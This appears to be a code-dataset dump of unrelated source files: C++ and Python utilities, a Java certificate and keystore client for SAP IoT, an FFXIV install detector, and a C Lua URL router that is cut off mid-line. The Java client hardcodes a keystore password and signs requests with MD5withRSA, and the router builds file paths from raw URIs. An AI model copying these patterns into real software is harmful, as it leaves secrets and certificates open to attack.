max_stars_count
int64
301
224k
text
stringlengths
6
1.05M
token_count
int64
3
727k
2,077
/** Copyright (c) 2015-present, Facebook, Inc. All rights reserved. This source code is licensed under the BSD-style license found in the LICENSE file in the root directory of this source tree. */ #include <gtest/gtest.h> #include <plist/Objects.h> using plist::Real; using plist::Integer; using plist::String; TEST(Real, Coerce) { auto s1 = String::New(""); auto r1 = Real::Coerce(s1.get()); EXPECT_EQ(r1, nullptr); auto s2 = String::New("one"); auto r2 = Real::Coerce(s2.get()); EXPECT_EQ(r2, nullptr); auto s3 = String::New("1"); auto r3 = Real::Coerce(s3.get()); EXPECT_EQ(r3->value(), 1.0); auto s4 = String::New("1.0"); auto r4 = Real::Coerce(s4.get()); EXPECT_EQ(r4->value(), 1.0); auto s5 = Integer::New(1); auto r5 = Real::Coerce(s5.get()); EXPECT_EQ(r5->value(), 1.0); }
368
746
<reponame>zhiqwang/mmdeploy<gh_stars>100-1000 # Copyright (c) OpenMMLab. All rights reserved. from mmcv.utils import Registry from mmdeploy.utils.config_utils import Backend def __build_backend_wrapper_class(backend: Backend, registry: Registry): return registry.module_dict[backend.value] BACKEND_WRAPPER = Registry('backend', __build_backend_wrapper_class) def get_backend_wrapper_class(backend: Backend) -> type: """Get the backend wrapper class from the registry. Args: backend (Backend): The backend enum type. Returns: type: The backend wrapper class """ return BACKEND_WRAPPER.build(backend) def get_backend_file_count(backend: Backend): backend_class = get_backend_wrapper_class(backend) return backend_class.get_backend_file_count()
281
301
package com.sap.iot.starterkit.cert; import java.io.ByteArrayInputStream; import java.io.Closeable; import java.io.File; import java.io.FileInputStream; import java.io.FileNotFoundException; import java.io.FileOutputStream; import java.io.FileWriter; import java.io.IOException; import java.io.InputStream; import java.io.OutputStream; import java.security.GeneralSecurityException; import java.security.Key; import java.security.KeyPair; import java.security.KeyPairGenerator; import java.security.KeyStore; import java.security.KeyStoreException; import java.security.NoSuchAlgorithmException; import java.security.Principal; import java.security.Signature; import java.security.UnrecoverableKeyException; import java.security.cert.Certificate; import java.security.cert.CertificateEncodingException; import java.security.cert.CertificateException; import java.security.cert.CertificateExpiredException; import java.security.cert.CertificateFactory; import java.security.cert.CertificateNotYetValidException; import java.security.cert.X509Certificate; import java.security.spec.PKCS8EncodedKeySpec; import java.util.ArrayList; import java.util.regex.Matcher; import java.util.regex.Pattern; import javax.net.ssl.KeyManager; import javax.net.ssl.KeyManagerFactory; import javax.net.ssl.SSLContext; import javax.net.ssl.SSLSocketFactory; import javax.net.ssl.TrustManager; import javax.net.ssl.TrustManagerFactory; import javax.net.ssl.X509TrustManager; import javax.xml.bind.DatatypeConverter; import com.sap.iot.starterkit.cert.type.Device; import sun.security.pkcs10.PKCS10; import sun.security.x509.X500Name; @SuppressWarnings("restriction") public class KeyStoreClient { private static final char[] KEYSTORE_SECRET = "<KEY>".toCharArray(); private static final char[] KEYSTORE_SECRET_SSL = "irjcVIEy78nre".toCharArray(); private static final String JDK_TRUSTSTORE_PATH = System.getProperty("java.home") + "/lib/security/cacerts"; private static final Pattern DEVICEID_PATTERN_SINGLE = Pattern.compile("(deviceId\\:)(.*)"); private static final Pattern TENANTID_PATTERN_SINGLE = Pattern.compile("(tenantId\\:)(.*)"); private KeyStore keyStore; private KeyStore keyStoreSSL; private String keyStorePath; private String keyStorePathSSL; public KeyStoreClient() throws KeyStoreException { ClassLoader classLoader = KeyStoreClient.class.getClassLoader(); keyStorePath = classLoader.getResource("").getPath() + "/" + "keystore.p12"; keyStorePathSSL = classLoader.getResource("").getPath() + "/" + "keystoreSSL.p12"; keyStore = load("PKCS12", keyStorePath, KEYSTORE_SECRET); keyStoreSSL = load("PKCS12", keyStorePathSSL, KEYSTORE_SECRET_SSL); } /** * Decodes the device type P12 certificate and stores X509 in the key store */ public void storeDeviceTypeCertificate(String path, String secret, String deviceTypeId) throws KeyStoreException { char[] secretAsChars = secret.toCharArray(); // X509 certificate Certificate certificate = null; // RSA private key Key key = null; try { KeyStore tempKeyStore = load("PKCS12", path, secretAsChars); // should be equal to "1" when we decode X509 certificate with native Java String alias = "1"; key = tempKeyStore.getKey(alias, secretAsChars); certificate = tempKeyStore.getCertificate(alias); storeCertificate(keyStore, KEYSTORE_SECRET, keyStorePath, "private", certificate, key); storeCertificate(keyStoreSSL, KEYSTORE_SECRET_SSL, keyStorePathSSL, "private", certificate, key); } catch (KeyStoreException | NoSuchAlgorithmException | UnrecoverableKeyException e) { throw new KeyStoreException("Unable to get X.509 certificate from P12 file", e); } } public void storeDeviceCertificateAsPEM(Certificate certificate, KeyPair keyPair, Device device, String folder) throws KeyStoreException { storePrivateKeyAsPEM(keyPair.getPrivate(), folder + device.getId() + "-private_key.pem"); storeCertificateAsPEM(certificate, folder + device.getId() + "-device_certificate.pem"); } public void storeDeviceCertificate(Certificate certificate, KeyPair keyPair, Device device) throws KeyStoreException { storeCertificate(keyStore, KEYSTORE_SECRET, keyStorePath, device.getId(), certificate, keyPair.getPrivate()); setPrivateCertificate(keyStoreSSL, KEYSTORE_SECRET_SSL, keyStorePathSSL, certificate, keyPair.getPrivate()); } /** * Retrieves device certificate out of the RDMS response (Device JSON object) */ public Certificate retrieveCertificate(Device device) throws KeyStoreException { byte[] bytes = DatatypeConverter .parseBase64Binary(device.getAuthentication().getX509Certificate()); ByteArrayInputStream is = new ByteArrayInputStream(bytes); Certificate certificate = null; try { CertificateFactory certificateFactory = CertificateFactory.getInstance("X.509"); certificate = certificateFactory.generateCertificate(is); } catch (CertificateException e) { throw new KeyStoreException("Unable to get X.509 certificate from RDMS response", e); } finally { closeStream(is); } return certificate; } /** * Check for a device certificate in the key store */ public boolean checkForDeviceCertificate(Device device) throws KeyStoreException { if (keyStore == null || !keyStore.containsAlias(device.getId()) || !keyStore.isKeyEntry(device.getId())) { return false; } X509Certificate deviceCertificate = (X509Certificate) keyStore .getCertificate(device.getId()); Key deviceCertificateKey; try { deviceCertificateKey = keyStore.getKey(device.getId(), KEYSTORE_SECRET); } catch (UnrecoverableKeyException | NoSuchAlgorithmException e1) { System.err.println("Device certificate private key could not be retrieved."); return false; } try { deviceCertificate.checkValidity(); } catch (CertificateExpiredException | CertificateNotYetValidException e) { System.err.println("Device certificate expired or not yet valid"); return false; } Principal principal = deviceCertificate.getSubjectDN(); String[] name = getPrincipalAttributeValue(principal, "CN", ""); String deviceId = extractMatchingValue(name, DEVICEID_PATTERN_SINGLE); if (device.getId().equals(deviceId)) { // device certificate is in the key store, set it as private for SSL connection setPrivateCertificate(keyStoreSSL, KEYSTORE_SECRET_SSL, keyStorePathSSL, deviceCertificate, deviceCertificateKey); return true; } return false; } /** * Creates a Certificate Signing Request and signs it with RSA private key */ public PKCS10 createCSRequest(Device device, KeyPair keyPair, boolean twoCommonNames) throws KeyStoreException { X500Name x500Name = createX500NameForDevice(device, twoCommonNames); PKCS10 request = null; try { request = new PKCS10(keyPair.getPublic()); Signature signature = Signature.getInstance("MD5withRSA"); signature.initSign(keyPair.getPrivate()); request.encodeAndSign(x500Name, signature); } catch (Exception e) { throw new KeyStoreException("Unable to create CSR request", e); } return request; } /** * Generates a PKI (a public and private key for RSA) */ public KeyPair generateKeyPair() throws KeyStoreException { KeyPair keyPair; try { KeyPairGenerator generator = KeyPairGenerator.getInstance("RSA"); generator.initialize(2048); keyPair = generator.generateKeyPair(); } catch (NoSuchAlgorithmException e) { throw new KeyStoreException("Unable to generate PKI", e); } return keyPair; } /** * Builds SSL Socket Factory for HTTP communication */ public SSLSocketFactory buildSSLSocketFactory() throws KeyStoreException { SSLContext sslContext = null; try { KeyManagerFactory keyManagerFactory = KeyManagerFactory .getInstance(KeyManagerFactory.getDefaultAlgorithm()); keyManagerFactory.init(keyStoreSSL, KEYSTORE_SECRET_SSL); KeyManager[] keyManagers = keyManagerFactory.getKeyManagers(); TrustManager[] trustManagers = new TrustManager[] { createTrustManagerFromDefaultJDKTrustStore() }; sslContext = SSLContext.getInstance("TLS"); sslContext.init(keyManagers, trustManagers, null); SSLContext.setDefault(sslContext); } catch (GeneralSecurityException | IOException e) { throw new KeyStoreException("Unable to instantiate SSL context", e); } return sslContext.getSocketFactory(); } private X509TrustManager createTrustManager(KeyStore truststore) throws NoSuchAlgorithmException, KeyStoreException { TrustManagerFactory tmfactory = TrustManagerFactory .getInstance(TrustManagerFactory.getDefaultAlgorithm()); tmfactory.init(truststore); TrustManager[] trustManagers = tmfactory.getTrustManagers(); if ((trustManagers != null) && (trustManagers.length > 0)) { return (X509TrustManager) trustManagers[0]; } return null; } private X509TrustManager createTrustManagerFromDefaultJDKTrustStore() throws IOException, GeneralSecurityException { KeyStore jdkTrustStore = load("jks", JDK_TRUSTSTORE_PATH, null); return createTrustManager(jdkTrustStore); } private void storeCertificate(KeyStore keyStore, char[] secret, String keyStorePath, String alias, Certificate certificate, Key key) throws KeyStoreException { keyStore.setKeyEntry(alias, key, secret, new Certificate[] { certificate }); store(keyStore, secret, keyStorePath); } /** * Set given certificate as a private one for SSL connectivity */ private void setPrivateCertificate(KeyStore keyStore, char[] secret, String keyStorePath, Certificate certificate, Key key) throws KeyStoreException { String alias = "private"; keyStore.deleteEntry(alias); keyStore.setKeyEntry(alias, key, secret, new Certificate[] { certificate }); // necessary for the correct TLS-Handshake store(keyStore, secret, keyStorePath); keyStore = load("PKCS12", keyStorePath, secret); } private KeyStore load(String type, String path, char[] secret) throws KeyStoreException { KeyStore keyStore = KeyStore.getInstance(type); InputStream is = null; if (path != null) { File file = new File(path); if (file.exists()) { try { is = new FileInputStream(file); } catch (FileNotFoundException e) { throw new KeyStoreException("Unable to open P12 key store file", e); } } } try { keyStore.load(is, secret); } catch (NoSuchAlgorithmException | CertificateException | IOException e) { throw new KeyStoreException("Unable to load a key store from P12 file", e); } return keyStore; } /** * Creates a subject name using the device id and other values from the device type certificate */ private X500Name createX500NameForDevice(Device device, boolean twoCommonNames) throws KeyStoreException { X509Certificate deviceTypeCertificate = (X509Certificate) keyStore .getCertificate("private"); Principal principal = deviceTypeCertificate.getSubjectDN(); String country = getPrincipalAttributeValue(principal, "C", "DE")[0]; String organization = getPrincipalAttributeValue(principal, "O", "SAP Trust Community")[0]; String unit = getPrincipalAttributeValue(principal, "OU", "IoT Services")[0]; String[] name = getPrincipalAttributeValue(principal, "CN", ""); String tenantId = extractMatchingValue(name, TENANTID_PATTERN_SINGLE); String commonName1 = "deviceId:" + device.getId(); String commonName2 = "tenantId:" + tenantId; String newName = null; if (twoCommonNames) { newName = "CN=" + commonName1 + ",CN=" + commonName2 + ",OU=" + unit + ",O=" + organization + ",C=" + country; } else { newName = "CN=" + commonName1 + "|" + commonName2 + ",OU=" + unit + ",O=" + organization + ",C=" + country; } X500Name x500Name = null; try { x500Name = new X500Name(newName); } catch (IOException e) { throw new KeyStoreException("Unable to create X500 name for a device", e); } return x500Name; } /** * Retrieves attributes from a common name or gives back a default value */ private String[] getPrincipalAttributeValue(Principal principal, String attributeName, String defaultValue) { ArrayList<String> attributeEntries = new ArrayList<String>(); String[] principleAttributes = principal.toString().split(","); for (String attribute : principleAttributes) { if (attribute.contains(attributeName + "=")) { attributeEntries.add(attribute.split("=")[1]); } } if (attributeEntries.isEmpty()) { return new String[] { defaultValue }; } else { return attributeEntries.toArray(new String[attributeEntries.size()]); } } private void store(KeyStore keyStore, char[] secret, String keyStorePath) throws KeyStoreException { OutputStream os = null; try { os = new FileOutputStream(keyStorePath); } catch (FileNotFoundException e) { throw new KeyStoreException("Unable to find P12 keystore file", e); } try { keyStore.store(os, secret); } catch (NoSuchAlgorithmException | CertificateException | IOException e) { throw new KeyStoreException("Unable to store the key store into output stream", e); } finally { closeStream(os); } } private void closeStream(Closeable stream) { if (stream != null) { try { stream.close(); } catch (IOException e) { System.err.println("Unable to close an I/O stream"); } } } private String extractMatchingValue(String[] commonName, Pattern pattern) { String Id = null; for (String element : commonName) { Matcher matcher = pattern.matcher(element); if (matcher.find()) { Id = matcher.group(2); } } return Id; } private void storePrivateKeyAsPEM(Key privateKey, String path) throws KeyStoreException { try (FileWriter myFW = new FileWriter(path)) { myFW.write("-----BEGIN RSA PRIVATE KEY-----"); myFW.write("\n"); PKCS8EncodedKeySpec pkcs8EncodedKeySpec = new PKCS8EncodedKeySpec( privateKey.getEncoded()); myFW.write(DatatypeConverter.printBase64Binary(pkcs8EncodedKeySpec.getEncoded()) .replaceAll("(.{64})", "$1\n")); if ((pkcs8EncodedKeySpec.getEncoded().length % 64) != 0) { myFW.write("\n"); } myFW.write("-----END RSA PRIVATE KEY-----"); myFW.write("\n"); } catch (IOException e) { throw new KeyStoreException("Unable to store the private key as PEM File", e); } } private void storeCertificateAsPEM(Certificate certificate, String path) throws KeyStoreException { try (FileWriter myFW = new FileWriter(path)) { myFW.write("-----BEGIN CERTIFICATE-----"); myFW.write("\n"); myFW.write(DatatypeConverter.printBase64Binary(certificate.getEncoded()) .replaceAll("(.{64})", "$1\n")); if ((certificate.getEncoded().length % 64) != 0) { myFW.write("\n"); } myFW.write("-----END CERTIFICATE-----"); myFW.write("\n"); } catch (IOException | CertificateEncodingException e) { throw new KeyStoreException("Unable to store the certificate as PEM File", e); } } }
5,002
303
#ifndef LILY_PKG_BUILTIN_H # define LILY_PKG_BUILTIN_H struct lily_symtab_; struct lily_import_entry_; void lily_init_builtin_package(struct lily_symtab_ *, struct lily_import_entry_ *); #endif
88
471
<filename>corehq/apps/custom_data_fields/migrations/0004_rename_tables.py<gh_stars>100-1000 # -*- coding: utf-8 -*- # Generated by Django 1.11.28 on 2020-04-26 14:24 from __future__ import unicode_literals from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('custom_data_fields', '0003_remove_sqlcustomdatafieldsdefinition_couch_id'), ] operations = [ migrations.RenameModel( old_name='SQLCustomDataFieldsDefinition', new_name='CustomDataFieldsDefinition', ), migrations.RenameModel( old_name='SQLField', new_name='Field', ), migrations.AlterModelTable( name='customdatafieldsdefinition', table=None, ), migrations.AlterModelTable( name='field', table=None, ), ]
410
345
#include "pch.h" #include "App_Misc_GameInstallationDetector.h" #include "XivAlexanderCommon/Utils_Win32_Process.h" static std::string TestPublisher(const std::filesystem::path& path) { // See: https://docs.microsoft.com/en-US/troubleshoot/windows/win32/get-information-authenticode-signed-executables constexpr auto ENCODING = X509_ASN_ENCODING | PKCS_7_ASN_ENCODING; HCERTSTORE hStore = nullptr; HCRYPTMSG hMsg = nullptr; DWORD dwEncoding = 0, dwContentType = 0, dwFormatType = 0; std::vector<Utils::CallOnDestruction> cleanupList; if (!CryptQueryObject(CERT_QUERY_OBJECT_FILE, path.c_str(), CERT_QUERY_CONTENT_FLAG_PKCS7_SIGNED_EMBED, CERT_QUERY_FORMAT_FLAG_BINARY, 0, &dwEncoding, &dwContentType, &dwFormatType, &hStore, &hMsg, nullptr)) return {}; if (hMsg) cleanupList.emplace_back([hMsg] { CryptMsgClose(hMsg); }); if (hStore) cleanupList.emplace_back([hStore] { CertCloseStore(hStore, 0); }); DWORD cbData = 0; std::vector<uint8_t> signerInfoBuf; for (size_t i = 0; i < 2; ++i) { if (!CryptMsgGetParam(hMsg, CMSG_SIGNER_INFO_PARAM, 0, signerInfoBuf.empty() ? nullptr : &signerInfoBuf[0], &cbData)) return {}; signerInfoBuf.resize(cbData); } const auto& signerInfo = *reinterpret_cast<CMSG_SIGNER_INFO*>(&signerInfoBuf[0]); CERT_INFO certInfo{}; certInfo.Issuer = signerInfo.Issuer; certInfo.SerialNumber = signerInfo.SerialNumber; const auto pCertContext = CertFindCertificateInStore(hStore, ENCODING, 0, CERT_FIND_SUBJECT_CERT, &certInfo, nullptr); if (!pCertContext) return {}; if (pCertContext) cleanupList.emplace_back([pCertContext] { CertFreeCertificateContext(pCertContext); }); std::wstring country; const auto pvTypePara = const_cast<char*>(szOID_COUNTRY_NAME); country.resize(CertGetNameStringW(pCertContext, CERT_NAME_ATTR_TYPE, 0, pvTypePara, nullptr, 0)); country.resize(CertGetNameStringW(pCertContext, CERT_NAME_ATTR_TYPE, 0, pvTypePara, &country[0], static_cast<DWORD>(country.size())) - 1); return Utils::ToUtf8(country); } static std::wstring ReadRegistryAsString(const wchar_t* lpSubKey, const wchar_t* lpValueName, int mode = 0) { if (mode == 0) { auto res1 = ReadRegistryAsString(lpSubKey, lpValueName, KEY_WOW64_32KEY); if (res1.empty()) res1 = ReadRegistryAsString(lpSubKey, lpValueName, KEY_WOW64_64KEY); return res1; } HKEY hKey; if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, lpSubKey, 0, KEY_READ | mode, &hKey)) return {}; Utils::CallOnDestruction c([hKey] { RegCloseKey(hKey); }); DWORD buflen = 0; if (RegQueryValueExW(hKey, lpValueName, nullptr, nullptr, nullptr, &buflen)) return {}; std::wstring buf; buf.resize(buflen + 1); if (RegQueryValueExW(hKey, lpValueName, nullptr, nullptr, reinterpret_cast<LPBYTE>(&buf[0]), &buflen)) return {}; buf.erase(std::ranges::find(buf, L'\0'), buf.end()); return buf; } App::Misc::GameInstallationDetector::GameReleaseInfo App::Misc::GameInstallationDetector::GetGameReleaseInfo(std::filesystem::path deepestLookupPath) { if (deepestLookupPath.empty()) deepestLookupPath = Utils::Win32::Process::Current().PathOf(); std::filesystem::path gameVersionPath; while (!exists(gameVersionPath = deepestLookupPath / "game" / "ffxivgame.ver")) { auto parentPath = deepestLookupPath.parent_path(); if (parentPath == deepestLookupPath) throw std::runtime_error("Game installation not found"); deepestLookupPath = std::move(parentPath); } GameReleaseInfo result{}; result.RootPath = std::move(deepestLookupPath); result.GameVersion = Utils::Win32::Handle::FromCreateFile(gameVersionPath, GENERIC_READ, FILE_SHARE_READ, nullptr, OPEN_EXISTING, 0).Read<char>(0, 256, Utils::Win32::Handle::PartialIoMode::AllowPartial); for (auto& chr : result.PathSafeGameVersion = result.GameVersion) { for (auto i : "<>:\"/\\|?*") { if (chr == i || chr < 32) chr = '_'; } } std::map<std::string, size_t> publisherCountries; for (const auto& [path, filenamePattern] : std::vector<std::pair<std::filesystem::path, std::wregex>>{ {result.RootPath / L"boot", std::wregex(LR"(^ffxiv.*\.exe$)", std::regex::icase)}, {result.RootPath / L"sdo", std::wregex(LR"(^sdologinentry\.dll$)", std::regex::icase)}, }) { try { for (const auto& item : std::filesystem::directory_iterator(path)) { if (!std::regex_search(item.path().filename().wstring(), filenamePattern)) continue; const auto publisherCountry = TestPublisher(item); if (!publisherCountry.empty()) publisherCountries[publisherCountry]++; } } catch (...) { // pass } } if (!publisherCountries.empty()) { result.CountryCode = std::ranges::max_element(publisherCountries)->first; if (result.CountryCode == "JP") { result.Region = Sqex::GameReleaseRegion::International; result.BootAppDirectlyInjectable = true; #if INTPTR_MAX == INT32_MAX result.BootApp = result.RootPath / L"boot" / L"ffxivboot.exe"; #elif INTPTR_MAX == INT64_MAX result.BootApp = result.RootPath / L"boot" / L"ffxivboot64.exe"; #endif result.RelatedApps = { result.RootPath / L"boot" / L"ffxivboot.exe", result.RootPath / L"boot" / L"ffxivboot64.exe", result.RootPath / L"boot" / L"ffxivconfig.exe", result.RootPath / L"boot" / L"ffxivconfig64.exe", result.RootPath / L"boot" / L"ffxivlauncher.exe", result.RootPath / L"boot" / L"ffxivlauncher64.exe", result.RootPath / L"boot" / L"ffxivupdater.exe", result.RootPath / L"boot" / L"ffxivupdater64.exe", }; } else if (result.CountryCode == "CN") { result.Region = Sqex::GameReleaseRegion::Chinese; result.BootApp = result.RootPath / L"FFXIVBoot.exe"; result.BootAppRequiresAdmin = true; result.BootAppDirectlyInjectable = true; result.RelatedApps = { result.RootPath / L"LauncherUpdate" / L"LauncherUpdater.exe", result.RootPath / L"FFXIVBoot.exe", result.RootPath / L"sdo" / L"sdologin" / L"sdologin.exe", result.RootPath / L"sdo" / L"sdologin" / L"Launcher.exe", result.RootPath / L"sdo" / L"sdologin" / L"sdolplugin.exe", result.RootPath / L"sdo" / L"sdologin" / L"update.exe", }; } else if (result.CountryCode == "KR") { result.Region = Sqex::GameReleaseRegion::Korean; result.BootApp = result.RootPath / L"boot" / L"FFXIV_Boot.exe"; result.BootAppRequiresAdmin = true; result.BootAppDirectlyInjectable = true; result.RelatedApps = { result.RootPath / L"boot" / L"FFXIV_Boot.exe", result.RootPath / L"boot" / L"FFXIV_Launcher.exe", }; } else throw std::runtime_error(std::format("{} is unsupported", result.CountryCode)); return result; } throw std::runtime_error("Could not determine game region"); } std::vector<App::Misc::GameInstallationDetector::GameReleaseInfo> App::Misc::GameInstallationDetector::FindInstallations() { std::vector<GameReleaseInfo> result; if (const auto reg = ReadRegistryAsString( LR"(SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2B41E132-07DF-4925-A3D3-F2D1765CCDFE})", L"DisplayIcon" ); !reg.empty()) { try { result.emplace_back(GetGameReleaseInfo(reg)); } catch (...) { // pass } } for (const auto steamAppId : { 39210, // paid 312060, // free trial }) { if (const auto reg = ReadRegistryAsString(std::format(LR"(SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Steam App {})", steamAppId).c_str(), L"InstallLocation"); !reg.empty()) { try { result.emplace_back(GetGameReleaseInfo(reg)); } catch (...) { // pass } } } if (const auto reg = ReadRegistryAsString( LR"(SOFTWARE\Classes\ff14kr\shell\open\command)", L"" ); !reg.empty()) { try { result.emplace_back(GetGameReleaseInfo(Utils::Win32::CommandLineToArgs(reg)[0])); } catch (...) { // pass } } if (const auto reg = ReadRegistryAsString( LR"(SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FFXIV)", L"DisplayIcon" ); !reg.empty()) { try { result.emplace_back(GetGameReleaseInfo(reg)); } catch (...) { // pass } } std::set<std::filesystem::path> seen; std::erase_if(result, [&seen](const auto& value) { return !seen.insert(value.RootPath).second; }); std::ranges::sort(result, [](const auto& l, const auto& r) { if (l.Region != r.Region) return l.Region < r.Region; if (l.GameVersion != r.GameVersion) return l.GameVersion< r.GameVersion; return l.RootPath < r.RootPath; }); return result; }
3,392
435
<reponame>amaajemyfren/data { "copyright_text": "Creative Commons Attribution license (reuse allowed)", "description": "In 1979, <NAME> and <NAME> coined the term \u201cPlanning Fallacy\u201d to describe plans and forecasts that are unrealistically close to best-case scenarios. These plans can be improved by consulting the statistics of similar cases. \n\nWhen you look at the software development and projects done using Agile methodologies, you can see the same phenomena. Projects are estimated too optimistically at start. We are usually too focused on best-case scenarios. Although our experience shows that statistically projects are done closer to their worst-case scenario, we stay optimistic. When issues arise, we blame the odd task that took more than expected, or the unexpected technical difficulty that took a few extra weeks or months. But we should have known better, shouldn\u2019t we have?\n\nIn this talk, Amin explains the psychology of estimation and the reasons behind our behaviour. He walks us through the red flags that we can look for to spot Planning Fallacy and describes solutions for estimating more accurately.", "duration": 1500, "language": "eng", "recorded": "2017-10-06", "related_urls": [ "https://2017.pygotham.org/talks/psychology-of-estimation-faster-is-not-always-better/" ], "speakers": [ "<NAME>" ], "tags": [], "thumbnail_url": "https://i.ytimg.com/vi/SppL54fVNe0/maxresdefault.jpg", "title": "Psychology of Estimation: Faster is not always better", "videos": [ { "type": "youtube", "url": "https://www.youtube.com/watch?v=SppL54fVNe0" } ] }
471
377
<reponame>MC-JY/inception /* * Licensed to the Technische Universität Darmstadt under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The Technische Universität Darmstadt * licenses this file to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package de.tudarmstadt.ukp.inception.recommendation.imls.stringmatch.span.trie; public interface KeySanitizer { public static final char SKIP_CHAR = 0; char map(char aChar); default CharSequence sanitize(CharSequence aKey) { StringBuilder sb = new StringBuilder(); for (int i = 0; i < aKey.length(); i++) { char c = map(aKey.charAt(i)); if (c != 0) { sb.append(c); } } return sb; } }
446
392
#include "config.h" #include "main.h" #include "network.h" #include "lua-ext.h" #include <regex.h> #include "cached-access.h" int lua_routed = 0; static char temp_buf[8192]; static char *v_p[100] = {0}; static int v_p_len[100] = {0}; static char *v_c[100] = {0}; static int v_p_count = 0; static char *v_p2[100] = {0}; static int v_p_len2[100] = {0}; static int v_p_count2 = 0; static int match_max = 0; static int match_max_len = 0; static int the_match_pat = 0; #define REGEX_CACHE_SIZE 102400 static regex_t *regex_cache[REGEX_CACHE_SIZE] = {0}; static uint32_t regex_cache_key[REGEX_CACHE_SIZE] = {0}; static int is_match(const char *rule, const char *uri) { static regex_t *re = NULL; static regmatch_t pm[100]; int m = strlen(rule); char *nr = ((m * 2 + 10 < 8192) ? (char *)temp_buf : malloc(m * 2 + 10)); int i = 0, gk = 0, nr_len = 0, fck = 0; v_p_count2 = 1; if(rule[0] != '^') { nr[0] = '^'; nr_len++; } for(i = 0; i < m; i++) { if(rule[i] == ':') { gk = 1; v_p2[v_p_count2] = (char *)rule + (i + 1); if(fck == 0) { fck = nr_len - 1; } } else { if((rule[i] == '(' || rule[i] == '[' || rule[i] == '$' || rule[i] == '/')) { if(fck == 0 && rule[i] != '/') { fck = nr_len - 1; } if(gk == 1) { gk = 0; v_p_len2[v_p_count2] = (rule + i) - v_p2[v_p_count2]; if(rule[i] == '/') { nr[nr_len++] = '('; nr[nr_len++] = '.'; nr[nr_len++] = '+'; nr[nr_len++] = ')'; v_p_count2 ++; } } else { v_p2[v_p_count2] = NULL; } } } if(gk == 0) { nr[nr_len++] = rule[i]; } if(rule[i] == '(') { v_p_count2 ++; } } if(gk == 1) { v_p_len2[v_p_count2] = (rule + i) - v_p2[v_p_count2]; nr[nr_len++] = '('; nr[nr_len++] = '.'; nr[nr_len++] = '+'; nr[nr_len++] = ')'; v_p_count2 ++; } nr[nr_len] = '\0'; if((fck > 1 && strncmp(uri, nr + 1, fck) != 0)) { return 0; } uint32_t key = fnv1a_32(nr, nr_len); int _key = key % REGEX_CACHE_SIZE; re = regex_cache[_key]; if(re && regex_cache_key[_key] != key) { re = NULL; regfree(regex_cache[_key]); free(regex_cache[_key]); regex_cache[_key] = NULL; } if(!re) { re = malloc(sizeof(regex_t)); if(!re || regcomp(re, nr, REG_EXTENDED | REG_ICASE) != 0) { LOGF(ERR, "Router Failed to compile regex '%s'", rule); if(re) { regfree(re); } if(nr != (char *)temp_buf) { free(nr); } return 0; } regex_cache[_key] = re; regex_cache_key[_key] = key; } unsigned int g = 0; int reti = regexec(re, uri, 100, pm, 0); if(reti == 0) { for(g = 0; g < 100; g++) { if(pm[g].rm_so == (size_t) - 1) { break; // No more groups } } if(g > match_max || (g >= match_max && nr_len > match_max_len)) { for(v_p_count = 0; v_p_count < v_p_count2; v_p_count++) { free(v_c[v_p_count]); v_c[v_p_count] = NULL; v_p[v_p_count] = v_p2[v_p_count]; v_p_len[v_p_count] = v_p_len2[v_p_count]; } match_max = g; match_max_len = nr_len; for(g = 1; g < match_max; g++) { if(v_p[g]) { free(v_c[g]); v_c[g] = malloc(pm[g].rm_eo - pm[g].rm_so + 1); memcpy(v_c[g], uri + pm[g].rm_so, pm[g].rm_eo - pm[g].rm_so); if(v_c[g][pm[g].rm_eo - pm[g].rm_so - 1] == '/') { pm[g].rm_eo --; } v_c[g][pm[g].rm_eo - pm[g].rm_so] = '\0'; } else { v_c[g] = NULL; } } } else { g = 0; } }/*else { char msgbuf[100]; regerror(reti, &re, msgbuf, sizeof(msgbuf)); fprintf(stderr, "Regex match failed: %s\n", msgbuf); }*/ if(nr != (char *)temp_buf) { free(nr); } return g; } int lua_f_router(lua_State *L) { if(lua_routed) { lua_pushnil(L); lua_pushnil(L); return 2; } lua_routed = 1; if(!lua_isstring(L, 1)) { lua_pushnil(L); lua_pushstring(L, "excepted uri"); return 2; } if(!lua_istable(L, 2)) { lua_pushnil(L); lua_pushstring(L, "excepted router table"); return 2; } const char *uri = lua_tostring(L, 1); int uri_len = strlen(uri); if(uri_len < 1 || uri[0] != '/') { lua_pushnil(L); lua_pushnil(L); lua_pushstring(L, "not a uri"); return 3; } if(lua_isstring(L, 3)) { // try local lua script file epdata_t *epd = NULL; lua_getglobal(L, "__epd__"); if(lua_isuserdata(L, -1)) { epd = lua_touserdata(L, -1); } lua_pop(L, 1); if(epd) { size_t len = 0; const char *fname = lua_tolstring(L, 3, &len); char *full_fname = (char *)&temp_buf; memcpy(full_fname, epd->vhost_root, epd->vhost_root_len); memcpy(full_fname + epd->vhost_root_len, fname, len); memcpy(full_fname + epd->vhost_root_len + len , uri, uri_len); len = epd->vhost_root_len + len + uri_len; full_fname[len] = '\0'; if(full_fname[len - 4] == '.' && full_fname[len - 3] == 'l' && full_fname[len - 1] == 'a') { if(cached_access(fnv1a_32(full_fname, len), full_fname) != -1) { lua_pushnil(L); lua_pushstring(L, full_fname + (len - uri_len)); return 2; } } if(full_fname[len - 1] != '/') { memcpy(full_fname + len, ".lua", 4); full_fname[len + 4] = '\0'; //if(access(full_fname, F_OK) != -1) { if(cached_access(fnv1a_32(full_fname, len + 4), full_fname) != -1) { lua_pushnil(L); lua_pushstring(L, full_fname + (len - uri_len)); return 2; } } else { memcpy(full_fname + len, "index.lua", 9); full_fname[len + 9] = '\0'; //if(access(full_fname, F_OK) != -1) { if(cached_access(fnv1a_32(full_fname, len + 9), full_fname) != -1) { lua_pushnil(L); lua_pushstring(L, full_fname + (len - uri_len)); return 2; } memcpy(full_fname + len - 1, ".lua", 4); full_fname[len - 1 + 4] = '\0'; //if(access(full_fname, F_OK) != -1) { if(cached_access(fnv1a_32(full_fname, len + 3), full_fname) != -1) { lua_pushnil(L); lua_pushstring(L, full_fname + (len - uri_len)); return 2; } } } } int pat 